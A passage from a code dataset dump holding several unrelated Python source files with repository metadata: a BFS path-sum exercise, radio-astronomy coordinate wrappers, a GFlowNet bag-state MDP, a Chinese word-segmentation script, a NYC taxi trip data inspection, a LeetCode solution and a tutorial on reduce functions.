ray.shutdown()\n\n","repo_name":"yangysc/ResiNet","sub_path":"ray-master/rllib/examples/evaluate_trained_agent_dppo.py","file_name":"evaluate_trained_agent_dppo.py","file_ext":"py","file_size_in_byte":12664,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"7897147179","text":"from collections import deque\ndef bfs(i,j):\n q = deque()\n visited = [[0]*N for _ in range(N)]\n\n q.append([i,j])\n visited[i][j] = arr[i][j]\n\n while q:\n i, j = q.popleft()\n for di, dj in [(-1,0),(1,0),(0,-1),(0,1)]:\n ni = i + di ; nj = j + dj\n if 0 <= ni < N and 0 <= nj < N:\n tmp = visited[i][j] + arr[ni][nj]\n # 방문을 하지 않았거나, 현재 있는 값보다 작은 값이라면 처리\n if not visited[ni][nj] or tmp < visited[ni][nj]:\n q.append([ni, nj])\n visited[ni][nj] = visited[i][j] + arr[ni][nj]\n return visited[N-1][N-1] # 맨 오른쪽 아래 값 출력\n\nT = int(input())\nfor tc in range(1, T+1):\n N = int(input())\n arr = [list(map(int, input().split())) for _ in range(N)]\n ans = bfs(0,0) # 맨 왼쪽 에서 시작\n print(f'#{tc} {ans}')\n\n'''\n3\n3\n1 2 3\n2 3 4\n3 4 5\n4\n2 4 1 3\n1 1 7 1\n9 1 7 10\n5 7 2 4\n5\n6 7 1 10 2\n10 2 7 5 9\n9 3 2 9 6\n1 6 8 2 9\n8 3 8 2 1\n'''","repo_name":"Going777/Algorithm","sub_path":"SWEA/practice/최소합.py","file_name":"최���합.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1688091963","text":"# See the LICENSE file at the top-level directory of this distribution.\n\n\"\"\"Module to wrap sky coordinates for passing to processing functions.\"\"\"\n\nimport ctypes\n\ntry:\n import astropy\n import astropy.coordinates\nexcept ImportError:\n astropy = None\n\nfrom .lib import Lib\nfrom .struct_wrapper import StructWrapper\n\n\nclass SkyCoord(StructWrapper):\n \"\"\"Class to wrap sky coordinates for passing to processing functions.\"\"\"\n\n def __init__(self, *args):\n \"\"\"Create a new sky coordinate object.\n\n The arguments are the coordinate type as a string,\n and up to three coordinate values coord0, coord1, coord2.\n\n Alternatively, an existing SkyCoord or an astropy SkyCoord object\n can be passed instead.\n\n The default epoch value is 2000.0, but can be set using\n :meth:`set_epoch`.\n \"\"\"\n create_args = tuple()\n if len(args) == 1:\n if isinstance(args[0], SkyCoord):\n other = args[0]\n # Copy of an existing SkyCoord.\n create_args = (\n other.type().encode(\"ascii\"),\n other.value(0),\n other.value(1),\n other.value(2),\n )\n elif astropy:\n if isinstance(args[0], astropy.coordinates.SkyCoord):\n astropy_coord = args[0]\n if astropy_coord.frame.name == \"icrs\":\n create_args = (\n \"icrs\".encode(\"ascii\"),\n astropy_coord.ra.rad,\n astropy_coord.dec.rad,\n 0.0,\n )\n else:\n raise RuntimeError(\"Unknown astropy coordinate frame\")\n else:\n raise RuntimeError(\n \"Unknown object passed to SkyCoord constructor\"\n )\n elif len(args) >= 3:\n create_args = (\n args[0].encode(\"ascii\"),\n args[1],\n args[2],\n args[3] if len(args) >= 4 else 0.0,\n )\n else:\n raise RuntimeError(\"Unknown construction method for SkyCoord\")\n super().__init__(\n Lib.sdp_sky_coord_create, create_args, Lib.sdp_sky_coord_free\n )\n\n def epoch(self) -> float:\n \"\"\"Returns the value of the coordinate epoch\"\"\"\n return Lib.sdp_sky_coord_epoch(self)\n\n def value(self, dim: int) -> float:\n \"\"\"Returns the value of the selected coordinate.\n\n Args:\n dim: Coordinate dimension index (starting 0; max 2).\n\n Returns:\n Value of specified coordinate, or 0 if 'dim' is out of bounds.\n \"\"\"\n return Lib.sdp_sky_coord_value(self, dim)\n\n def set_epoch(self, epoch: float) -> None:\n \"\"\"Sets the coordinate epoch value.\n\n Args:\n epoch: Value of coordinate epoch.\n \"\"\"\n Lib.sdp_sky_coord_set_epoch(self, epoch)\n\n def type(self) -> str:\n \"\"\"Returns the coordinate type string\"\"\"\n return Lib.sdp_sky_coord_type(self).decode() # convert bytes to str\n\n\nLib.wrap_func(\n \"sdp_sky_coord_create\",\n restype=SkyCoord.handle_type(),\n argtypes=[\n ctypes.c_char_p,\n ctypes.c_double,\n ctypes.c_double,\n ctypes.c_double,\n ],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_free\",\n restype=None,\n argtypes=[SkyCoord.handle_type()],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_epoch\",\n restype=ctypes.c_double,\n argtypes=[SkyCoord.handle_type()],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_value\",\n restype=ctypes.c_double,\n argtypes=[SkyCoord.handle_type(), ctypes.c_int32],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_set_epoch\",\n restype=None,\n argtypes=[\n SkyCoord.handle_type(),\n ctypes.c_double,\n ],\n)\n\nLib.wrap_func(\n \"sdp_sky_coord_type\",\n restype=ctypes.c_char_p,\n argtypes=[SkyCoord.handle_type()],\n)\n","repo_name":"ska-telescope/ska-sdp-func","sub_path":"src/ska_sdp_func/utility/sky_coord.py","file_name":"sky_coord.py","file_ext":"py","file_size_in_byte":3985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10996293488","text":"\"\"\"\n\n\"\"\"\nfrom collections import defaultdict, Counter\nimport copy\nimport functools\n\nimport torch\n\nfrom .. import network, utils\nfrom ..actor import Actor\nfrom .basemdp import BaseState, BaseMDP\n\nimport enum\nfrom dataclasses import dataclass\n\n\nclass BagState(BaseState):\n \"\"\" Bag / Multiset state, as Counter (dict) mapping {char: count}. \"\"\"\n def __init__(self, content, is_leaf=False):\n \"\"\" content: Counter (dict) mapping {char: count}. \"\"\"\n self.content = self.canonicalize(content)\n self.is_leaf = is_leaf\n\n def __repr__(self):\n sorted_chars = sorted(list(self.content.keys()))\n sortedbag = ''.join([k*self.content[k] for k in sorted_chars])\n return f'{sortedbag}-{self.is_leaf}'\n\n def __eq__(self, other):\n return self.content_equals(other) and self.is_leaf == other.is_leaf\n\n def __hash__(self):\n return hash(repr(self))\n\n def __len__(self):\n if len(self.content) == 0:\n return 0\n return sum(self.content.values())\n\n def max_group_size(self):\n if len(self.content) == 0:\n return 0\n return max(self.content.values())\n\n def canonicalize(self, content):\n return Counter(content) if type(content) != Counter else content\n\n def content_equals(self, other):\n for k, v in self.content.items():\n if v > 0:\n if k not in other.content:\n return False\n if other.content[k] != v:\n return False\n return True\n\n def is_member(self, other):\n if self.is_leaf:\n return self.__eq__(other)\n for k, v in self.content.items():\n if v > 0:\n if k not in other.content:\n return False\n if other.content[k] < v:\n return False\n return True\n\n \"\"\"\n Modifying state\n \"\"\"\n def _del(self, action):\n \"\"\" Construct new BagState, given BagAction.\n Return None if invalid action.\n \"\"\"\n if self.content[action.char] <= 0:\n return None\n new_content = copy.copy(self.content)\n new_content[action.char] = max(0, new_content[action.char] - 1)\n return BagState(new_content)\n\n def _add(self, action):\n \"\"\" Construct new BagState, given BagAction.\n Return None if invalid action.\n \"\"\"\n new_content = copy.copy(self.content)\n new_content[action.char] += 1\n return BagState(new_content)\n\n def _terminate(self):\n if not self.is_leaf:\n return BagState(self.content, is_leaf=True)\n else:\n return None\n \n def _unterminate(self):\n if self.is_leaf:\n return BagState(self.content, is_leaf=False)\n else:\n return None\n\nclass BagActionType(enum.Enum):\n # Forward actions\n Stop = enum.auto()\n AddChar = enum.auto()\n # Backward actions\n UnStop = enum.auto()\n RemoveChar = enum.auto()\n\n\n@dataclass\nclass BagAction:\n action: BagActionType\n char: str = None\n\n\nclass BagMDP(BaseMDP):\n \"\"\" MDP for building a bag or multiset, comprised of an alphabet 'ABCDEFG'.\n\n Action set is fixed and not a function of state.\n\n Forward actions: [stop, add A, add B, ..., add G]\n Reverse actions: [Unstop, remove A, remove B, ..., remove G]\n\n Cannot contain any CUDA elements: instance is passed\n to ray remote workers for substructure guidance, which need\n access to get_children & is_member.\n \"\"\"\n def __init__(self, args, alphabet = list('ABCDEFG')):\n self.args = args\n self.alphabet = alphabet\n self.alphabet_set = set(self.alphabet)\n self.substruct_size = 4\n self.forced_stop_len = 7\n\n self.fwd_actions = [BagAction(BagActionType.Stop)] + \\\n [BagAction(BagActionType.AddChar, c)\n for c in self.alphabet]\n self.back_actions = [BagAction(BagActionType.UnStop)] + \\\n [BagAction(BagActionType.RemoveChar, c)\n for c in self.alphabet]\n self.state = BagState\n self.parallelize_policy = False\n\n def root(self):\n return self.state([])\n\n @functools.cache\n def is_member(self, query, target):\n return query.is_member(target)\n\n \"\"\"\n Children, parents, and transition.\n Calls BaseMDP functions.\n Uses transition_fwd/back and get_fwd/back_actions.\n \"\"\"\n @functools.cache\n def get_children(self, state):\n return BaseMDP.get_children(self, state)\n\n @functools.cache\n def get_parents(self, state):\n return BaseMDP.get_parents(self, state)\n\n @functools.cache\n def get_unique_children(self, state):\n return BaseMDP.get_unique_children(self, state)\n\n @functools.cache\n def get_unique_parents(self, state):\n return BaseMDP.get_unique_parents(self, state)\n\n def has_stop(self, state):\n return len(state) == self.forced_stop_len\n\n def has_forced_stop(self, state):\n return len(state) == self.forced_stop_len\n\n def transition_fwd(self, state, action):\n \"\"\" Applies BagAction to state. Returns State or None (invalid transition). \n \n Action Types: Stop, AddChar\n \"\"\"\n if state.is_leaf:\n return None\n if self.has_forced_stop(state) and action.action != BagActionType.Stop:\n return None\n\n if action.action == BagActionType.Stop:\n if self.has_stop(state):\n return state._terminate()\n else:\n return None\n\n if action.action == BagActionType.AddChar:\n return state._add(action)\n \n def transition_back(self, state, action):\n \"\"\" Applies BagAction to state. Returns State or None (invalid transition). \n\n Action types: UnStop, RemoveChar \n \"\"\"\n if state == self.root():\n return None\n if state.is_leaf and action.action != BagActionType.UnStop:\n return None\n\n if action.action == BagActionType.UnStop:\n if state.is_leaf:\n return state._unterminate()\n else:\n return None\n\n if action.action == BagActionType.RemoveChar:\n return state._del(action)\n\n \"\"\"\n Actions\n \"\"\"\n def get_fwd_actions(self, state):\n \"\"\" Gets forward actions from state. Returns List of Actions.\n\n For many MDPs, this is independent of state. The num actions\n returned must match the policy's output dim. List of actions\n is used to associate policy output scores with states, so it\n must be in a consistent, deterministic order given state.\n \"\"\"\n return self.fwd_actions\n\n def get_back_actions(self, state):\n \"\"\" Gets backward actions from state. Returns List of Actions.\n\n For many MDPs, this is independent of state. The num actions\n returned must match the policy's output dim. List of actions\n is used to associate policy output scores with states, so it\n must be in a consistent, deterministic order given state.\n \"\"\"\n return self.back_actions\n\n\n\"\"\"\n Actor\n\"\"\"\nclass BagActor(Actor):\n \"\"\" Holds BagMDP and GPU elements: featurize & policies. \"\"\"\n def __init__(self, args, mdp):\n self.args = args\n self.mdp = mdp\n\n self.alphabet = mdp.alphabet\n self.char_to_idx = {a: i for (i, a) in enumerate(self.alphabet)}\n\n self.ft_dim = len(self.alphabet) + 2\n\n self.policy_fwd = super().make_policy(self.args.sa_or_ssr, 'forward')\n self.policy_back = super().make_policy(self.args.sa_or_ssr, 'backward')\n\n @functools.cache\n def featurize(self, state):\n \"\"\" Featurize BagState.\n\n Features\n - first len(alphabet) indices: count of that symbol\n - max count of symbol\n - (bool) max is >= substruct size\n \"\"\" \n embed = [0.] * len(self.alphabet)\n content = state.content\n for char, idx in self.char_to_idx.items():\n if char in content:\n embed[idx] = float(content[char])\n \n max_group_size = state.max_group_size()\n embed += [max_group_size]\n embed += [float(bool(max_group_size >= self.mdp.substruct_size))]\n return torch.tensor(embed, device = self.args.device)\n \n \"\"\"\n Networks\n \"\"\"\n def net_forward_sa(self):\n hid_dim = self.args.sa_hid_dim\n n_layers = self.args.sa_n_layers\n net = network.make_mlp(\n [self.ft_dim] + \\\n [hid_dim] * n_layers + \\\n [len(self.mdp.fwd_actions)]\n )\n return network.StateFeaturizeWrap(net, self.featurize)\n\n def net_backward_sa(self):\n hid_dim = self.args.sa_hid_dim\n n_layers = self.args.sa_n_layers\n net = network.make_mlp(\n [self.ft_dim] + \\\n [hid_dim] * n_layers + \\\n [len(self.mdp.back_actions)]\n )\n return network.StateFeaturizeWrap(net, self.featurize)\n \n def net_encoder_ssr(self):\n \"\"\" Featurized Bag State -> encoding. \"\"\"\n hid_dim = self.args.ssr_encoder_hid_dim\n n_layers = self.args.ssr_encoder_n_layers\n ssr_embed_dim = self.args.ssr_embed_dim\n net = network.make_mlp(\n [self.ft_dim] + \\\n [hid_dim] * n_layers + \\\n [ssr_embed_dim]\n )\n return network.StateFeaturizeWrap(net, self.featurize)\n\n def net_scorer_ssr(self):\n \"\"\" [encoding1, encoding2] -> scalar \"\"\"\n hid_dim = self.args.ssr_scorer_hid_dim\n n_layers = self.args.ssr_scorer_n_layers\n ssr_embed_dim = self.args.ssr_embed_dim\n return network.make_mlp(\n [2*ssr_embed_dim] + \\\n [hid_dim] * n_layers + \\\n [1]\n )\n\n","repo_name":"maxwshen/gflownet","sub_path":"gflownet/MDPs/bagmdp.py","file_name":"bagmdp.py","file_ext":"py","file_size_in_byte":9000,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"3941313878","text":"import jieba\nimport jieba.analyse\nimport pandas as pd\nimport csv\n\njieba.load_userdict('./senior project/jieba dict.txt')\ndf_articles_data = pd.read_csv('./senior project/趨勢king.csv')\narticles_data = df_articles_data['留言'].to_list()\nword_list = []\n\nfor i in articles_data:\n seg_list = jieba.lcut(i)\n stopwords = [line.strip() for line in open('./senior project/stopwords.txt', 'r', encoding='utf-8').readlines()]\n for word in seg_list:\n if word not in stopwords:\n if word != ' ':\n word_list.append(word)\n data_row = [word]\n with open('./senior project/split word done/趨勢king.csv', 'a', newline='', encoding='utf_8_sig') as f: \n csv_write = csv.writer(f)\n csv_write.writerow(data_row)\n with open('./senior project/split word done/趨勢king.txt', 'a', newline='', encoding='utf_8_sig') as f: \n csv_write = csv.writer(f)\n csv_write.writerow(data_row)\nprint(word_list) ","repo_name":"Wakamodoor/NTUT_theNewFinalProject","sub_path":"backend/jieba_split_word.py","file_name":"jieba_split_word.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16721339790","text":"# Big Data Inspection - NYC Taxi Trips\n# Ben Moeller - Dataset Group 4\n\nimport csv\nimport datetime\nfrom math import floor, radians, cos, sin, asin, sqrt\n\ndef haversine(lat1, lon1, lat2, lon2):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n c = 2 * asin(sqrt(a))\n r = 3956 # miles\n return c*r\n\ndef update_minmax(cmin, cmax, candidate):\n omin = cmin\n omax = cmax\n if candidate is None:\n return omin, omax\n if cmin is None or cmin > candidate:\n omin = candidate\n if cmax is None or cmax < candidate:\n omax = candidate\n return omin, omax\n\nfn = \"trip_data_4_skip.csv\"\nofn = \"trip_data_4_skip_output_new.csv\"\nf = open(fn, 'r')\nreader = csv.reader(f)\n\n# Get info about the headers and first row of data\nn = 0\nfor row in reader:\n print(row)\n n += 1\n if n > 5:\n break\n'''\n['medallion', ' hack_license', ' vendor_id', ' rate_code',\n' store_and_fwd_flag', ' pickup_datetime', ' dropoff_datetime',\n' passenger_count', ' trip_time_in_secs', ' trip_distance', ' pickup_longitude',\n' pickup_latitude', ' dropoff_longitude', ' dropoff_latitude']\n\n['91F6EB84975BBC867E32CB113C7C2CD5', 'AD8751110E6292079EB10EB9481FE1A6',\n'CMT', '1', 'N', '2013-04-04 18:47:45', '2013-04-04 19:00:25', '1', '759',\n'2.50', '-73.957855', '40.76532', '-73.976273', '40.785648']\n'''\n\n'''\n ID Col Name Value @ Row 1\n----------------------------------------------------------------\n 0 medallion 91F6EB84975BBC867E32CB113C7C2CD5\n 1 hack_license AD8751110E6292079EB10EB9481FE1A6\n 2 vendor_id CMT\n 3 rate_code 1\n 4 store_and_fwd_flag N\n 5 pickup_datetime 2013-04-04 18:47:45\n 6 dropoff_datetime 2013-04-04 19:00:25\n 7 passenger_count 1\n 8 trip_time_in_secs 759\n 9 trip_distance 2.50\n 10 pickup_longitude -73.957855\n 11 pickup_latitude 40.76532\n 12 dropoff_longitude -73.976273\n 13 dropoff_latitude 40.785648\n'''\n\nmindt = None\nmaxdt = None\n\nminlat = None\nmaxlat = None\nminlon = None\nmaxlon = None\n\navgpulat = 0\navgpulatc = 0\navgpulon = 0\navgpulonc = 0\n\navgdolat = 0\navgdolatc = 0\navgdolon = 0\navgdolonc = 0\n\navgodo = 0\navghav = 0\navgdistc = 0\n\nbin_width = 0.25 # Width of bins\noverflow = 15 # Distance at which we stop caring about individual bins\ndistance_bins = [0]*int((overflow/bin_width)+1) # Odometer distance\nhaversine_bins = [0]*int((overflow/bin_width)+1) # Haversine distance\n\nminodo = None\nmaxodo = None\nminhav = None\nmaxhav = None\n\nodoq1 = 1.0693\nodoq3 = 3.1883\n\nhavq1 = 0.7777\nhavq3 = 2.4579\n\noutlier_iqr_thresh = 1.5\n# Outliers are considered to be greater than Q3 + (IQR_THRESH * IQR)\n# or less than Q1 - (IQR_THRESH * IQR)\n\navgodo_noout = 0\navgodo_noout_c = 0\navgodo_outc = 0\navghav_noout = 0\navghav_noout_c = 0\navghav_outc = 0\n\nminrc = None\nmaxrc = None\n\nminpc = None\nmaxpc = None\n\nmintt = None\nmaxtt = None\n\nvid_values = {}\nrc_values = {}\nsaff_values = {}\npc_values = {}\n\npph = {}\nfor i in range(24):\n pph[str(i).zfill(2)] = {}\n\nodoiqr = None\nhaviqr = None\nif odoq1 is not None and odoq3 is not None:\n odoiqr = odoq3 - odoq1\nelse:\n avgodo_noout = \"Not Calculated\"\nif havq1 is not None and havq3 is not None:\n haviqr = havq3 - havq1\nelse:\n avghav_noout = \"Not Calculated\"\n\nn = -1\nprintevery = 100000\nfor row in reader:\n n += 1\n if n == 0:\n # Ignore header row since there's no data\n continue\n pudt = datetime.datetime.strptime(row[5], \"%Y-%m-%d %H:%M:%S\")\n if mindt is None or pudt < mindt:\n mindt = pudt\n dodt = datetime.datetime.strptime(row[6], \"%Y-%m-%d %H:%M:%S\")\n if maxdt is None or dodt > maxdt:\n maxdt = dodt\n if row[11] != '':\n pulat = float(row[11])\n if pulat is not None and pulat != 0 and 38.0293 < pulat < 42.65565:\n if maxlat is None:\n maxlat = pulat\n else:\n maxlat = max(maxlat, pulat)\n if minlat is None:\n minlat = pulat\n else:\n minlat = min(minlat, pulat)\n avgpulat = (avgpulat*avgpulatc + pulat) / (avgpulatc+1)\n avgpulatc += 1\n if row[10] != '':\n pulon = float(row[10])\n if pulon is not None and pulon != 0 and -78.47667 < pulon < -70.62036:\n if maxlon is None:\n maxlon = pulon\n else:\n maxlon = max(maxlon, pulon)\n if minlon is None:\n minlon = pulon\n else:\n minlon = min(minlon, pulon)\n avgpulon = (avgpulon*avgpulonc + pulon) / (avgpulonc+1)\n avgpulonc += 1\n if row[13] != '':\n dolat = float(row[13])\n if dolat is not None and dolat != 0 and 38.0293 < dolat < 42.65565:\n maxlat = max(maxlat, dolat)\n minlat = min(minlat, dolat)\n avgdolat = (avgdolat*avgdolatc + dolat) / (avgdolatc+1)\n avgdolatc += 1\n if row[12] != '':\n dolon = float(row[12])\n if dolon is not None and dolon != 0 and -78.47667 < dolon < -70.62036:\n maxlon = max(maxlon, dolon)\n minlon = min(minlon, dolon)\n avgdolon = (avgdolon*avgdolonc + dolon) / (avgdolonc+1)\n avgdolonc += 1\n\n # Trip Distance\n dist_bin = floor(float(row[9]) / bin_width)\n if float(row[9]) > overflow:\n dist_bin = int(overflow / bin_width)\n #print(dist_bin)\n distance_bins[dist_bin] += 1\n # Haversine Distance\n hav_dist = haversine(pulat, pulon, dolat, dolon)\n hav_bin = floor(hav_dist / bin_width)\n if hav_dist > overflow:\n hav_bin = int(overflow / bin_width)\n haversine_bins[hav_bin] += 1\n\n avgodo = (avgodo*avgdistc + float(row[9])) / (avgdistc+1)\n avghav = (avghav*avgdistc + hav_dist) / (avgdistc+1)\n avgdistc += 1\n\n if odoq1 is not None and odoq3 is not None:\n if (odoq1 - (outlier_iqr_thresh * odoiqr)) < float(row[9]) < (odoq3 + (outlier_iqr_thresh * odoiqr)):\n avgodo_noout = (avgodo_noout*avgodo_noout_c + float(row[9])) / (avgodo_noout_c+1)\n avgodo_noout_c += 1\n else:\n avgodo_outc += 1\n if havq1 is not None and havq3 is not None:\n if (havq1 - (outlier_iqr_thresh * haviqr)) < hav_dist < (havq3 + (outlier_iqr_thresh * haviqr)):\n avghav_noout = (avghav_noout*avghav_noout_c + hav_dist) / (avghav_noout_c+1)\n avghav_noout_c += 1\n else:\n avghav_outc += 1\n\n minodo, maxodo = update_minmax(minodo, maxodo, float(row[9]))\n minhav, maxhav = update_minmax(minhav, maxhav, hav_dist)\n\n minrc, maxrc = update_minmax(minrc, maxrc, int(row[3])) # Rate Code\n minpc, maxpc = update_minmax(minpc, maxpc, int(row[7])) # Passenger Count\n mintt, maxtt = update_minmax(mintt, maxtt, int(row[8])) # Trip Time\n\n # Passengers per hour\n # Get the current hour and date from the pickup datetime\n puhour = pudt.strftime(\"%H\")\n pudate = pudt.strftime(\"%Y-%m-%d\")\n #print(puhour)\n if pudate not in pph[puhour].keys():\n pph[puhour][pudate] = int(row[7])\n else:\n pph[puhour][pudate] += int(row[7])\n\n # Distinct Values\n # Vendor ID\n if row[2] == \"\":\n row[2] = \"NULL\"\n if row[2] not in vid_values.keys():\n vid_values[row[2]] = 1\n else:\n vid_values[row[2]] += 1\n\n # Rate Code\n if row[3] == \"\":\n row[3] = \"NULL\"\n if row[3] not in rc_values.keys():\n rc_values[row[3]] = 1\n else:\n rc_values[row[3]] += 1\n\n # Store and Forward Flag\n if row[4] == \"\":\n row[4] = \"NULL\"\n if row[4] not in saff_values.keys():\n saff_values[row[4]] = 1\n else:\n saff_values[row[4]] += 1\n\n # Passenger Count\n if row[7] == \"\":\n row[7] = \"NULL\"\n if row[7] not in pc_values.keys():\n pc_values[row[7]] = 1\n else:\n pc_values[row[7]] += 1\n\n if n % printevery == 0:\n print(n)\n\nmindtstr = mindt.strftime(\"%Y-%m-%d %H:%M:%S\")\nmaxdtstr = maxdt.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n#print(str(n)+\" rows in dataset\")\n#print(\"Datetime range covered: \"+mindtstr+\" to \"+maxdtstr)\n#print(\"Area covered: \"+str(minlat)+\", \"+str(minlon)+\" to \"+str(maxlat)+\", \"+str(maxlon))\n#print(\"Average pickup location: \"+str(avgpulat)+\", \"+str(avgpulon))\n#print(\"Average dropoff location: \"+str(avgdolat)+\", \"+str(avgdolon))\n#print(distance_bins)\n#print(haversine_bins)\n#print(pph)\n\navg_pph = {}\nfor hour in pph.keys():\n sum = 0\n count = 0\n for day in pph[hour].keys():\n sum += pph[hour][day]\n count += 1\n avg_pph[hour] = sum/count\n#print(avg_pph)\n\n# Get histogram quartiles\nodoq1calc = None\nodoq3calc = None\nq1_count = n/4\nq3_count = 3*n/4\nq1done = False\nfor i in range(int(overflow/bin_width)+1):\n if q1_count > distance_bins[i] and not q1done:\n q1_count -= distance_bins[i]\n elif q1done is not True:\n # Get the percentage of how far through the bin we are\n pct = q1_count / distance_bins[i]\n odoq1calc = (bin_width*i) + (pct*bin_width)\n q1done = True\n if q3_count > distance_bins[i]:\n q3_count -= distance_bins[i]\n else:\n pct = q3_count / distance_bins[i]\n odoq3calc = (bin_width*i) + (pct*bin_width)\n break\n\nhavq1calc = None\nhavq3calc = None\nq1_count = n/4\nq3_count = 3*n/4\nq1done = False\nfor i in range(int(overflow/bin_width)+1):\n if q1_count > haversine_bins[i] and not q1done:\n q1_count -= haversine_bins[i]\n elif q1done is not True:\n # Get the percentage of how far through the bin we are\n pct = q1_count / haversine_bins[i]\n havq1calc = (bin_width*i) + (pct*bin_width)\n q1done = True\n if q3_count > haversine_bins[i]:\n q3_count -= haversine_bins[i]\n else:\n pct = q3_count / haversine_bins[i]\n havq3calc = (bin_width*i) + (pct*bin_width)\n break\n\nwith open(ofn, 'w', newline='') as outcsv:\n writer = csv.writer(outcsv)\n writer.writerow([\"Records: \", n])\n writer.writerow([\"Datetime Range\"])\n writer.writerow([mindtstr, maxdtstr])\n\n writer.writerow([\"Area Range\"])\n writer.writerow([\"Min Lat\", \"Min Lon\", '', \"Max Lat\", \"Max Lon\"])\n writer.writerow([minlat, minlon, '', maxlat, maxlon])\n writer.writerow([\"Avg Odometer Distance: \", avgodo])\n writer.writerow([\"Avg Haversine Distance: \", avghav])\n writer.writerow([\"Avg Pickup\", '', '', \"Avg Dropoff\"])\n writer.writerow([avgpulat, avgpulon, '', avgdolat, avgdolon])\n\n writer.writerow([\"Avg Odometer Distance (No Outliers): \", avgodo_noout, \"Odo Outliers Found: \", avgodo_outc])\n writer.writerow([\"Avg Haversine Distance (No Outliers): \", avghav_noout, \"Hav Outliers Found: \", avghav_outc])\n\n writer.writerow([\"Distance Histogram\"])\n binlabels = list(range(int(overflow/bin_width)+1))\n binlabels = [bin_width * x for x in binlabels]\n writer.writerow(binlabels)\n writer.writerow(distance_bins)\n writer.writerow([\"Distance Q1\", \"Distance Q3\"])\n writer.writerow([odoq1calc, odoq3calc])\n writer.writerow([\"Haversine Histogram\"])\n writer.writerow(binlabels)\n writer.writerow(haversine_bins)\n writer.writerow([\"Haversine Q1\", \"Haversine Q3\"])\n writer.writerow([havq1calc, havq3calc])\n\n writer.writerow([\"Odometer Distance Range\"])\n writer.writerow([minodo, maxodo])\n\n writer.writerow([\"Haversine Distance Range\"])\n writer.writerow([minhav, maxhav])\n\n writer.writerow([\"Travel Time Range\"])\n writer.writerow([mintt, maxtt])\n\n writer.writerow([\"Passengers Per Hour\"])\n pph_keys = avg_pph.keys()\n #print(pph_keys)\n writer.writerow(pph_keys)\n pph_values = [avg_pph[x] for x in pph_keys]\n writer.writerow(pph_values)\n\n writer.writerow([\"Vendor IDs\"])\n vid_keys = list(vid_values.keys())\n vid_keys.sort()\n writer.writerow(vid_keys)\n writer.writerow([vid_values[x] for x in vid_keys])\n writer.writerow([\"Rate Codes\"])\n rc_keys = list(rc_values.keys())\n rc_keys.sort()\n writer.writerow(rc_keys)\n writer.writerow([rc_values[x] for x in rc_keys])\n writer.writerow([\"Store and Forward Flags\"])\n saff_keys = list(saff_values.keys())\n saff_keys.sort()\n writer.writerow(saff_keys)\n writer.writerow([saff_values[x] for x in saff_keys])\n writer.writerow([\"Passenger Counts\"])\n pc_keys = list(pc_values.keys())\n pc_keys.sort()\n writer.writerow(pc_keys)\n writer.writerow([pc_values[x] for x in pc_keys])\n\nprint(\"Inspection complete, look at \"+ofn+\" for results\")\n","repo_name":"moellerben/IA626BigDataInspection-Moeller","sub_path":"inspect.py","file_name":"inspect.py","file_ext":"py","file_size_in_byte":12549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11443834345","text":"from collections import Counter\nclass Solution:\n def maxOperations(self, nums: List[int], k: int) -> int:\n nums = Counter([i for i in nums if i < k])\n ans = 0\n for i in nums:\n if k-i in nums and nums[i]>0 and nums[k-i]>0:\n count = nums[i]//2 if i==k-i else min(nums[i],nums[k-i])\n nums[i]-=count\n nums[k-i]-=count\n ans+=count\n return ans\n \n \n# from collections import defaultdict\n# class Solution:\n# def maxOperations(self, nums: List[int], k: int) -> int:\n# pair = defaultdict(int) # integer 0 is the default value of all the keys\n# res = 0\n \n# for n in nums:\n# if pair[n]: # if we encountered k - n already\n# res += 1\n# pair[n] -= 1\n# else: # if we did'n find a pair yet\n# pair[k - n] += 1\n \n# return res\n","repo_name":"kwilliam777/CodingTestStudy","sub_path":"weekly assingment/week17/k_1679_m.py","file_name":"k_1679_m.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"31778396990","text":"\"\"\"\nReducing functions in python are functions that recombine an iterable recursively,\nending up with a single retunr value.\n\"\"\"\n\n# Ex. 01 - Finding the maximum value in a iterable\nl = [5, 8, 6, 10, 9]\n\nmax_value = lambda a, b : a if a >b else b\n\ndef max_sequence(sequence):\n result = sequence[0]\n for e in sequence[1:]:\n result = max_value(result, e) # result = max(5,8)\n return result\n\n# Como para encontrar o mínimo é semelhante é possível usar uma padrão.\n# fn = max_value\n\ndef _reduce(fn, sequence):\n result = sequence[0]\n for x in sequence[1:]:\n result = fn(result, x)\n return result\n\nprint(_reduce(lambda a, b: a if a > b else b, l )) # maximum\n\nprint(_reduce(lambda a, b: a if a < b else b, l )) # minimum\n\n# Adding all the elemnts in a list\n\nadd = lambda a, b: a + b\n\nl = [5, 8, 6, 10, 9]\n\ndef _reduce(fn, sequence):\n result = sequence[0]\n for x in sequence[1:]:\n result = fn(result, x)\n return result\n\nprint(_reduce(add, l))\n\n# The functools module\n\nfrom functools import reduce\n\nl = [5, 8, 6, 10, 9]\n\n# Usando reduce com qlq iterável\nprint(reduce(lambda a, b: a if a > b else b, l))\nprint(reduce(lambda a, b: a if a < b else b, l))\nprint(reduce(lambda a, b: a if a < b else b, {10, 5, 2, 4}))\nprint(reduce(lambda a, b: a if a < b else b, 'python'))\n\nprint(min([5, 8, 6]))\nprint(max([5, 8, 6]))\nprint(sum([5, 8, 6]))\n\n# any(l) --- retorna True if any element in l is truthy - False otherwise\n# all(l) ---\n\n# Using reduce to reproduce any\n\nl = [0, '', None, 100] # 100 é 